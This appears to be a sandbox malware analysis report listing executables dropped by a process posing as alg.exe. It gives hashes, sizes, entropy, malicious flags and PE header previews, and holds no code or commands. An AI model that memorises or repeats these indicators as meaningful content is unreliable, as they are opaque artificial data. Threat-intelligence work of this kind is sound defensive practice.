SSDEEP: 12288:zgdwatXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:kbtsqjnhMgeiCl7G0nehbGZpbD
MD5: 31794014806E0EB77F28D433ECDEF297
SHA1: E6A07CBF1BB8D60952B3D984837F8497135CB0FB
SHA-256: FD804E1956D887E0571ABE3231E1107137837D7D57A72CCC2CAF00196EB4537D
SHA-512: 1FAEED7A80AD7CBE147AD40BA2DB0E0C86DDBBF9DD1AFF8F4841BC5553770361D605BC7E9E71E8571C2AC2BCA0AAD628E299F506C2D48E0D9408B3422FEAA5CC
Malicious: true
Reputation: unknown
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........?...^.U.^.U.^.U.&rU.^.U.$.T.^.U.$.T.^.U.$.T.^.U2,.T.^.U2,.T.^.U.^.U.\.U.$.T.^.U.$.T.^.U.$.T.^.U.$.U.^.U.^vU.^.U.$.T.^.URich.^.U........................PE..L......e............... ............&q............@...........................*......5.......................................p..,.......`...........................(...8...............................@............................................text............................... ..`.rdata..|o.......p..................@..@.data....T.......R..................@....c2r....T....p.......L...................rsrc...`............N..............@..@.reloc...@(..........^..............@...........................................................................................................................................................................................................................................

Process: C:\Windows\System32\alg.exe
File Type: PE32 executable (console) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 1623040
Entropy (8bit): 3.7998210318359744
Encrypted: false
SSDEEP: 12288:P03Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:AsqjnhMgeiCl7G0nehbGZpbD
MD5: A7E73CEE6E39EB89593CC8D381DDDEBF
SHA1: 263B125E3DFD705ACED71169069458141B7C9C09
SHA-256: 429886AFEC1A01A925860C1C9E9504511E1274E46C8F976EA036DE0C9C43F2A5
SHA-512: 1D1D030631E39289B4179F1133F844787B243878F5AD236BF33995F56505C9625EB36FD12AD76120954C31187FF89252BB1636AACDDB7E09AD337DCAE111DF69
Malicious: true
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........T{..T{..T{..].!.D{..4...P{..4...M{..4...X{..4...Q{.....Q{..T{..0{..1...W{..1...S{..1.M.U{..1...U{..RichT{..........................PE..L....[.d............... ."...(......x........@....@...........................(......X.......................................I.......p...............................R..8............................A..@............@..T....H..`....................text...? .......".................. ..`.rdata..(....@.......&..............@..@.data...<....`.......<..............@....rsrc........p.......>..............@..@.reloc... (..........D..............@...................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1893888
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.284188930841853
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24576:FAZHHrTZF/ZsqjnhMgeiCl7G0nehbGZpbD:Fe3ZFdDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                    MD5:5FFD5FDE2B04379EE9D2977FFEA0C4D2
                                                                                                                                                                                                                                                                                                                                                    SHA1:27910E834E44A60DE890055476F6661EECEDC540
                                                                                                                                                                                                                                                                                                                                                    SHA-256:4436CCE4B93DBD88A17147EF61892C2E697167C8F5C4D305CF12439C887CB5A1
                                                                                                                                                                                                                                                                                                                                                    SHA-512:739F7600A1EDF499AAD0214E4F6F8DA102125E08EDFABC3BFEC40E3B11F2303F9C22CFEE44D9B3D206D5B4482B1116E919AF3D0ECED5A663509AC15319C4B89B
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......!.e...e...e.......n..............I.......w.......p.......d.......r.......n...e...........{.......d...e.F.d.......d...Riche...........................PE..L....;.d............... .....X......q........0....@...........................,.....I...........................................x.... ...a..............................8..............................@............0..p.......`....................text............................... ..`.rdata......0......................@..@.data....,..........................@....rsrc....a... ...b..................@..@.reloc...@(..........F..............@...................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):53721600
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):6.543428943834304
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:1572864:bNVpTyR96CwKImp81ujlSHFsQ4adtZp20wfP+9HgoZRZa:bQ9lw68HSq
                                                                                                                                                                                                                                                                                                                                                    MD5:A824D670A7E61E62B9DD37A5215A44C6
                                                                                                                                                                                                                                                                                                                                                    SHA1:34C57F9718025377CD00E8D1B6B768957EB46D29
                                                                                                                                                                                                                                                                                                                                                    SHA-256:2819B413BB6B39FDE3D2407FD06DF27AB94E71222618C36B32A33B1C493504DE
                                                                                                                                                                                                                                                                                                                                                    SHA-512:ADB1A2C5892BDA0CADDCF21A452EE117E3137F3214920C75DCAC5C11E03191E01E00F122CDD965B22C7D24A21823AF3994AE268FA5E324F1953681C781802D8E
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......X.mj.r.9.r.9.r.9...9.r.9|..8.r.9|..8;r.9|..8.r.9|..8.r.9...8.r.9...8.r.9...8.r.9.r.9Gm.9y..8.r.9y..8.r.9y..8.o.9y..8.r.9y..9.r.9.r.9.r.9y..8.r.9Rich.r.9........PE..L......e..........".... .._.........y........@f...@.......................... 5....."U4.................................[.......h......$DW.........................,q..8...................(.q...... `.@.............`.....d........................text...,._......._................. ..`.rdata...bM...`..dM..._.............@..@.data................\..............@....detourc.............p..............@..@.c2r.....................................rsrc...$DW.....FW.................@..@.reloc....$.. ....#.................@...........................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):40811520
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):6.461598995553934
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:786432:rbuMdv8TOUI/JgcnYblPv+msZPH53u5LBsk/Q4YbFuceo4h5ayMI5:ryM8TOtIlPv+msZPH1u5WkID5uceo4qY
                                                                                                                                                                                                                                                                                                                                                    MD5:E751AAFD687FC908ADC922D00C654AEE
                                                                                                                                                                                                                                                                                                                                                    SHA1:4D0902D149DB207250A997FA3A769CED942D4B57
                                                                                                                                                                                                                                                                                                                                                    SHA-256:A380C4BB22E77E1A874DEC4C67B20B0F9E8C6713F5B79C618D0F8ACC95F2BEDA
                                                                                                                                                                                                                                                                                                                                                    SHA-512:15930E3ED0D51F06BED6E3199CD4569147A45403BE0D27077CB6DCEB6D76516C80163F270D002D75DE7A92E20A94CC608044B3D53FC6CC3B885F5E9DAD7D4673
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$........j............sI.....q......q......q......q.....Jy.....Jy.....Jy.............q......q......q......q......q%.....M.....q.....Rich....................PE..L......e............... ............h.......`....@...........................o.......n.............................4...^....P..T....`...]>.............................8........................... 5..@............ ..l............................text...P........................... ..`.rdata..8.;.. ....;.................@..@.data....<.......0..................@....detourc.....0......................@..@.c2r....|....P...........................rsrc....]>..`...^>.................@..@.reloc...P....S..@...|S.............@...................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1657344
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.63515521293864
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24576:fE8DMeflpnIOvYUZsqjnhMgeiCl7G0nehbGZpbD:ftDD9pnIOTDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                    MD5:9946191EC5A1ADF22E40F07208EEC581
                                                                                                                                                                                                                                                                                                                                                    SHA1:873A58AEAB07F9A63B6C56B8CA8648A48616F416
                                                                                                                                                                                                                                                                                                                                                    SHA-256:6F5CD41BAB2498EAAF0B8824DA6F0311424BAD1B6D72FD0344A853F330B423EF
                                                                                                                                                                                                                                                                                                                                                    SHA-512:B2C5C0E3737CCCEE834DC990C69A879E9B16D21231DFDC262AF74671F4D8DD835893947FAE1E1A706760A425E563BCF7353A099D5417BE7B75E142B628712C91
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."..........J......@!.........@....................................X..... .............................................................X........F......................T.......................(...P...@...........@...`............................text............................... ..`.rdata..8...........................@..@.data...XL....... ...d..............@....pdata...F.......H..................@..@.00cfg..8.... ......................@..@.gxfg....*...0...,..................@..@.retplne.....`...........................tls.........p......................@..._RDATA..\...........................@..@.rsrc...X...........................@..@.reloc...P.......@..................@...................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):4364800
Entropy (8bit):6.748491255670945
Encrypted:false
SSDEEP:49152:qB1sstqMHiq8kBfK9a+cOVE/TqEpEepIkRqqUu9wg6KFYso8l8E0Dmg27RnWGj:EHzorVmr2ZkRpdJYoleD527BWG
MD5:BEC5CB77EEEFEED61D2DC0D43744B309
SHA1:4E0F5383CD26944B33E661D57016295C72C9F1CA
SHA-256:B836F7DE823BBE9CBDBDFBD874F632F45D70E45CE4BDC9AC2D72874F8A56B78D
SHA-512:2D4CA0364464F0D2234AA02F223BBFDBC3A3022EC441A77ED6308EF01AC74226ADBB22955326AE21CBF93A586B7B1CE25CC0F8E06003BB21D9274C6AD7DD2C8C
Malicious:true
Reputation:unknown
Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e..........".......'..".......K.........@.............................PD.......B... .....................................................P.... 4.......2..Q..................to..8...................`j..(.....'.@...........0.......`........................text...'.'.......'................. ..`.rdata...A....'..B....'.............@..@.data........./......./.............@....pdata...Q....2..R....0.............@..@.00cfg..0....p3......42.............@..@.gxfg....2....3..4...62.............@..@.retplne......3......j2..................tls..........3......l2.............@...LZMADEC.......3......p2............. ..`_RDATA..\.....4.......2.............@..@malloc_h......4.......2............. ..`.rsrc........ 4.......2.............@..@.reloc... ...0;.......9.............@...................................................................................................
Process:C:\Windows\System32\alg.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1238528
Entropy (8bit):5.146943007352681
Encrypted:false
SSDEEP:12288:S3w1uVdSEjfXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3b:SEyTfsqjnhMgeiCl7G0nehbGZpbD
MD5:4E2198E4AED547277DD6DC98A54E90EE
SHA1:57061EC924FBB4D35FAA88C30EFB7987D7786E3E
SHA-256:0992005CE733CC14038A468EB77E91FE65178A94701B10F0AAAD21F58B3B5314
SHA-512:5F230AAFF0418447ED9A057F18F5B70E9F8D1458A4361FC57062777A105507BD3A489B990787C3521A13DC1F54C52427390E32E421997D9F508F9EF3AA2F292C
Malicious:true
Reputation:unknown
Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."............................@.............................P......{Q.... ..................................................]..(....................................W..T...............................@............`..X............................text............................... ..`.rdata..,...........................@..@.data...0............j..............@....pdata...............v..............@..@.00cfg..8...........................@..@.gxfg...P...........................@..@.retplne................................_RDATA..\...........................@..@.rsrc...............................@..@.reloc...P.......@..................@...........................................................................................................................................................................................................................
Process:C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:modified
Size (bytes):2354176
Entropy (8bit):7.049988995561512
Encrypted:false
SSDEEP:49152:QhDdVrQ95RW0YEHyWQXE/09Val0GuDmg27RnWGj:QhHYW+HyWK1D527BWG
MD5:D70E9DD978CEC9B2F71CAD2BF25D3351
SHA1:98E62F7E6B1B50DC169CA462E637894FBFA86520
SHA-256:9BBD0A4B75F9B89EA7B159A6169730B71674B88FDF35866BC66DAB2064B3F682
SHA-512:01ACD72A906D69F7D765A0FA89B681088DF47A63D0FCE889E1CA3149C0B3BE6740CA076D28A547CECBE9B70AA4B411A299F226A6E6B4F39BD8B7AA30AE7CEE7B
Malicious:true
Reputation:unknown
Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."......2...........b.........@.............................`%........... .........................................p%......>).......@..................................8.......................(....c..@........... 0..P............................text....0.......2.................. ..`.rdata.......P.......6..............@..@.data...4...........................@....pdata..............................@..@.00cfg..0...........................@..@.gxfg............0..................@..@.retplne.................................tls....!...........................@..._RDATA..\.... ......................@..@malloc_h.....0...................... ..`.rsrc........@......................@..@.reloc.......`......................@...........................................................................................................................................
Process:C:\Windows\System32\alg.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1825280
Entropy (8bit):7.158515249988856
Encrypted:false
SSDEEP:24576:Z70E0ZCQZMiU6Rrt9RoctGfmddYsqjnhMgeiCl7G0nehbGZpbD:d0EzQSyRPRoc1oDmg27RnWGj
MD5:8BE1DB966932191237D7340EC23C5D9B
SHA1:149CEE28F687D963C18F8B5D39A524B87354854A
SHA-256:E31CE2356BC609DDAAA274E321BF74776AB76980006CA5DB239B205258DE46F2
SHA-512:8D271558ECE6A8546A9B69EDB78EEFA90FEA6725B632ED9939D1BBC615F17E86810A3C7BAFEAFEC3E696EBB8525A8CEE9EB3BB343D8E0F4F3B362A4FC30D359B
Malicious:true
Reputation:unknown
Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."..........v.......k.........@.............................0.......j.... ..........................................u......ly....... ..........,....................d..T...................hc..(.......@...........@... ............................text............................... ..`.rdata.............................@..@.data........@......."..............@....pdata..,...........................@..@.00cfg..0...........................@..@.gxfg....,..........................@..@.retplne.................................tls................................@..._RDATA..\...........................@..@malloc_h............................ ..`.rsrc........ ......................@..@.reloc.......0......................@...........................................................................................................................................
Process:C:\Windows\System32\alg.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1847808
Entropy (8bit):7.145492426413554
Encrypted:false
SSDEEP:24576:viD2VmA1YXwHwlklb8boUuWPg2gbsqjnhMgeiCl7G0nehbGZpbD:qD2VmAyiwIb8boQUDmg27RnWGj
MD5:1EC8E5779FEF3A59A3E75B9E9B2AD818
SHA1:FA1841E8BEFCFDF6FE45D021D093289FD6B0AD2E
SHA-256:2357FB938F56EB018A0DF1662FEC949F675F5A873325FB815137DFE5F54DECCC
SHA-512:8C34A8CB66EA785F676AAFD3DD9F8D49A997E3AA2E13856EFE70624304BDD118864012B03BADE07E16F8118B463F754F28D8A4890D5750777FCA05D1697FDE9B
Malicious:true
Reputation:unknown
Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."..................p.........@.............................p.......i.... .........................................2...........d....`..8....P..........................8......................(.......@...............X...(........................text...4........................... ..`.rdata..|...........................@..@.data................r..............@....pdata.......P.......n..............@..@.00cfg..0...........................@..@.gxfg....,..........................@..@.retplne..... ...........................tls.........0.......0..............@..._RDATA..\....@.......2..............@..@malloc_h.....P.......4.............. ..`.rsrc...8....`.......6..............@..@.reloc.......p.......B..............@...........................................................................................................................................
Process:C:\Windows\System32\alg.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):2853376
Entropy (8bit):6.950759853675308
Encrypted:false
SSDEEP:49152:QfD3zO9ZhBGloizM3HRNr00sDmg27RnWGj:6DaalxzM00sD527BWG
MD5:49B0EBB0F907EB64165FB848D1C38326
SHA1:3DE68B5D5D1750BB03FCF23622B603387633CF2B
SHA-256:CF716EE7D197EED04A2A041AC956A8FB48B22B81A8F37F32B3C7FA44AE38DBA1
SHA-512:2FA84DCE04EB9B8DD4CD962C416B2115A3959FA60997881901F9A8EB6964E0EFE105DA1E03A5F8D1396B5E127994FC2CE31F9886A149681236DD0DF3AB235EC2
Malicious:true
Reputation:unknown
Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."......l...2......@..........@..............................-.......+... .................................................h.........!.. ...P ........................8......................(...P...@...............x............................text....k.......l.................. ..`.rdata...............p..............@..@.data...T....p.......^..............@....pdata.......P ......d..............@..@.00cfg..0.... !......* .............@..@.gxfg...P1...0!..2..., .............@..@.retplne.....p!......^ ..................tls..........!......` .............@...LZMADEC.......!......b ............. ..`_RDATA..\.....!......t .............@..@malloc_h......!......v ............. ..`.rsrc.... ....!.."...x .............@..@.reloc........$.......".............@...................................................................................................
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):4320256
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):6.824627211926078
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:49152:+TaRe7mkn5KLvD5qGVC0080pb4tgLUgGEsLABD5wTQh07yrLMLl9YPh7Dmg27RnN:xI72LvkrDpbxJRoIMED527BWG
                                                                                                                                                                                                                                                                                                                                                    MD5:80F0F4BB7F7715A4DBCBAC043D6F0C7D
                                                                                                                                                                                                                                                                                                                                                    SHA1:AD2918233F7C4B58A70AD48212F84358C171025A
                                                                                                                                                                                                                                                                                                                                                    SHA-256:9FFB1FFE04FBF5C02E5A58381C82B3E89D9D65E69EF826692D1E9C690296AA25
                                                                                                                                                                                                                                                                                                                                                    SHA-512:53207EDBDA4DF3F5F148A74E22B5957BAE4D1E725E46C714FCC52F356F601DCEF482FAC223089A289C8CFD5F5752EC8B0D5AFCC324E8E7B85AC8C11779F90ECB
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e..........".......,......... k.........@..............................C.....x.B... ..........................................'3......+3.P.....8.x....P6..e..................h.2.T.....................2.(...P"-.@............43.......3. ....................text...E.,.......,................. ..`.rdata..4#....-..$....,.............@..@.data........@4.......4.............@....pdata...e...P6..f...45.............@..@.00cfg..0.....7.......6.............@..@.gxfg...@4....7..6....6.............@..@.retplne......8.......6..................tls....-.... 8.......6.............@...CPADinfo8....08.......6.............@...LZMADEC......@8.......6............. ..`_RDATA..\....`8.......6.............@..@malloc_h.....p8.......6............. ..`.rsrc...x.....8.......6.............@..@.reloc... ...p:.......8.............@...........................................................
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):2062336
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.097259330462941
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24576:TW9Jml9mmijviMnF+ZxmQWcbLw8VIsqjnhMgeiCl7G0nehbGZpbD:TWnm5iOMkjmQWkV0Dmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                    MD5:54584AC4C10C60AB9EBA0FE907F7FC61
                                                                                                                                                                                                                                                                                                                                                    SHA1:369097633128BBC499C76B75060F56231E082BA5
                                                                                                                                                                                                                                                                                                                                                    SHA-256:7FA984BB7E7B02779DD9A290F0BB5F99555B091A211DD41CDFEC41523FB44096
                                                                                                                                                                                                                                                                                                                                                    SHA-512:D13123A9E835CE4ACA6C6800544A3C206A93804803B7F02C2577C172575F88E463F93DE33036206C5C1E948904067E53A2F087FC0F3E68986CBEA1B47D1809FE
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."......h...4......P..........@.............................. .....5..... .................................................Z...................H......................8.......................(...`...@...........(...@............................text....g.......h.................. ..`.rdata...).......*...l..............@..@.data...............................@....pdata..H...........................@..@.00cfg..0....P.......H..............@..@.gxfg...p-...`.......J..............@..@.retplne.............x...................tls.................z..............@...CPADinfo8............|..............@..._RDATA..\............~..............@..@malloc_h............................ ..`.rsrc...............................@..@.reloc..............................@...................................................................................................
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1801216
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.166367432408611
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24576:WwNHwoYhua6MtjRO4qbBJTY6mY1uIgisqjnhMgeiCl7G0nehbGZpbD:WwNPdQO7BJTfmElDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                    MD5:5C832DB96D31214D25E479A1869598ED
                                                                                                                                                                                                                                                                                                                                                    SHA1:95802B47D5A821A2AE3D51BA4029C839B30F88D0
                                                                                                                                                                                                                                                                                                                                                    SHA-256:900DD7C9602D9C49844D8A67AB6159FB39170823AB06DA081C816D9E71235E24
                                                                                                                                                                                                                                                                                                                                                    SHA-512:B5CCC790725CFBBB7ACE8419343A66CA5694AA851D3C236A75EBDF88C78F0E9B6D81A03529F0697549847DD85FB19630F0957107B7ECC156034AF18EF048E2C8
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."......*...r......P..........@.......................................... .........................................C...........................T.......................T.......................(....R..@............"..8.......`....................text....(.......*.................. ..`.rdata.......@......................@..@.data...@...........................@....pdata..T...........................@..@.00cfg..0....@.......N..............@..@.gxfg....,...P...,...P..............@..@.retplne.............|...................tls.................~..............@..._RDATA..\...........................@..@malloc_h............................ ..`.rsrc...............................@..@.reloc..............................@...........................................................................................................................................
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1847808
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.145505400713692
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24576:JiD2VmA1YXwHwlklb8boUuWPg2gbsqjnhMgeiCl7G0nehbGZpbD:ID2VmAyiwIb8boQUDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                    MD5:C07ED499F2CFE8B7D40D398A6319C9B9
                                                                                                                                                                                                                                                                                                                                                    SHA1:7288B7649036FBC8D7F801D6FCFE3468CF498AA9
                                                                                                                                                                                                                                                                                                                                                    SHA-256:CFE9AB2CF89B0B8CC6B5314F4B1520743E0CFEC26690089756F049AEB872F8CB
                                                                                                                                                                                                                                                                                                                                                    SHA-512:D44604548156191F4B4541FADF1047F167DAFBDE0D832C8DE306F08C45A0D44C2ADBD6CD5FFD5993179F3FCAAC733D276EF618AD11EF2FE2192FEE4B5B1362EF
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."..................p.........@.............................p......0j.... .........................................2...........d....`..8....P..........................8......................(.......@...............X...(........................text...4........................... ..`.rdata..|...........................@..@.data................r..............@....pdata.......P.......n..............@..@.00cfg..0...........................@..@.gxfg....,..........................@..@.retplne..... ...........................tls.........0.......0..............@..._RDATA..\....@.......2..............@..@malloc_h.....P.......4.............. ..`.rsrc...8....`.......6..............@..@.reloc.......p.......B..............@...........................................................................................................................................
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1801216
Entropy (8bit): 7.166382734110445
Encrypted: false
SSDEEP: 24576:PwNHwoYhua6MtjRO4qbBJTY6mY1uIgisqjnhMgeiCl7G0nehbGZpbD:PwNPdQO7BJTfmElDmg27RnWGj
MD5: D7E25B3568023902C9AFC91618530D8B
SHA1: DFFE9E7FAE73B1A590B11B18CC2FD6F19A7F270D
SHA-256: C42EE00C1CAFDB6877846950D53D86B500633C5678C1361658F9EE689AA01236
SHA-512: D986AB021112830B8E726D233E9A0ADC5CD209CC9BBEEEBBC07B2EADB0230BC5A5C02AEE9BBCEC900B64DE6E9A5F3929F4104C76D0042AD73DBF6433187427CF
Malicious: true
Reputation: unknown

Process: C:\Windows\System32\alg.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 1325568
Entropy (8bit): 5.141864615182121
Encrypted: false
SSDEEP: 24576:c4lbht6BH9sqjnhMgeiCl7G0nehbGZpbD:NlNtqHhDmg27RnWGj
MD5: 2FB887F14765F5FF5C39A0570C449623
SHA1: 7266F9E2586F4160D5E369110D93C3D3D4986002
SHA-256: 4DFCEAC318479D82CB46422B59DC8F0AE380793126403477F7D55078540E82D2
SHA-512: 0D0890973994C2E4DA2313E5D42D5D4FA47021F19E41F4B6208A5671637231E396E43B761A58F880F09131DA6E20EB7C9E04558C26B6B99E1B2ACFA9FD64AC0F
Malicious: true
Reputation: unknown

Process: C:\Windows\System32\alg.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 1221120
Entropy (8bit): 5.138861265658774
Encrypted: false
SSDEEP: 12288:wIkOkTB+wRXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kw:wIxkTBVRsqjnhMgeiCl7G0nehbGZpbD
MD5: ACFC609282199DCED7D19DCEB946F42D
SHA1: 84F13FB4837733B92998B1F41114B4A3AC325F79
SHA-256: EFE76729CDF4C3F74A85E704F869772C52B2B58BB41C4CD8C4A5E6D073102DE0
SHA-512: BAB196B49CD5E2568E0EE36D81BC78E78D07A0617ADA11EC8544C56C5F040B571B2CA5AF6FDB51B218A4E2E28B70DA8686BFD84DDEBCD7466A5EC2AAD6ED57C5
Malicious: true
Reputation: unknown

Process: C:\Windows\System32\alg.exe
File Type: PE32+ executable (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 1335296
Entropy (8bit): 5.236795122252887
Encrypted: false
SSDEEP: 12288:x4lssmroCqXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kw:xcssmrUsqjnhMgeiCl7G0nehbGZpbD
MD5: EA538B11B909EACEF2E3922406888EA1
SHA1: 7989BAFAE860F5AE156FF17C6BAD506F6AC51892
SHA-256: 481B035AFBD5A83CD62154B3F46715C0263BE0A87BEDB1182D74E83D581E43ED
SHA-512: 538D465B928AFC17F4AECDF1FCFB181C5B09A0DAB4D14069F7B8E615AE7DACA28F748EA11BBD2C99676A549798F5BB9D0AF2BF3F9B0E4651CB37D61D9768A470
Malicious: true
Reputation: unknown

Process: C:\Windows\System32\alg.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 1383936
Entropy (8bit): 5.338531367767514
Encrypted: false
SSDEEP: 24576:f03cT++foSBWU2YxhkgHsqjnhMgeiCl7G0nehbGZpbD:83cK+foQWU2YnPbDmg27RnWGj
MD5: 53167C25B2720934AE902AF10C541870
SHA1: F87D87D4DCCAB229707DB96BB072F7AF1015B244
